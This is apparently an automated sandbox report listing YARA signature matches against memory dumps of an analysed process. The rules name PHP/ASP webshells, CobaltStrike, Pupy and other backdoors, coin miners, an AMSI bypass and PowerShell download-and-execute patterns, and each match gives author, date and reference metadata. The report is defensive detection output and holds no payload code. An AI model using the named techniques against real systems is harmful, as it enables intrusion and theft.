    Source: 00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORY, Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
    Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
    Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
    Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
    Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6333202344.0000028BD76A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
    Source: 00000023.00000003.6332319497.0000028BD7A3C000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
    Source: 00000023.00000003.6308819602.0000028BD71FC000.00000004.00000001.sdmp, type: MEMORY, Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
    Source: 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp, type: MEMORY, Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp, type: MEMORY, Matched rule: HackTool_Samples description = Hacktool, score =
    Source: 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp, type: MEMORY, Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
    Source: 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
    Source: 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORY, Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
    Source: 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp, type: MEMORY, Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_jsp_by_string date = 2021/01/09, author = Arnim Rupp, description = JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 06b42d4707e7326aff402ecbb585884863c6351a
    Source: 00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
    Source: 00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6324978129.0000028BD7280000.00000004.00000001.sdmp, type: MEMORY, Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
    Source: 00000023.00000003.6311853685.0000028BD7A3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
    Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
    Source: 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000023.00000003.6337514171.0000028BD6735000.00000004.00000001.sdmp, type: MEMORYMatched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
    Source: 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp, type: MEMORYMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
    Source: 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
    Source: 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp, type: MEMORYMatched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6308216657.0000028BD7178000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6294570357.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6324441483.0000028BD7178000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_base64_encoded_payloads date = 2021/01/07, author = Arnim Rupp, description = php webshell containing base64 encoded payload, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 88d0d4696c9cb2d37d16e330e236cb37cfaec4cd
    Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
    Source: 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
    Source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6338346630.0000028BD733C000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORYMatched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
    Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
    Source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp, type: MEMORYMatched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
    Source: 00000023.00000003.6296311842.0000028BD60E4000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, type: MEMORYMatched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
    Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
    Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
    Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
    Source: 00000023.00000003.6318490215.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6344793289.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
    Source: 00000023.00000003.6282034966.0000028BD78B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
    Source: 00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
    Source: 00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
    Source: 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: 00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
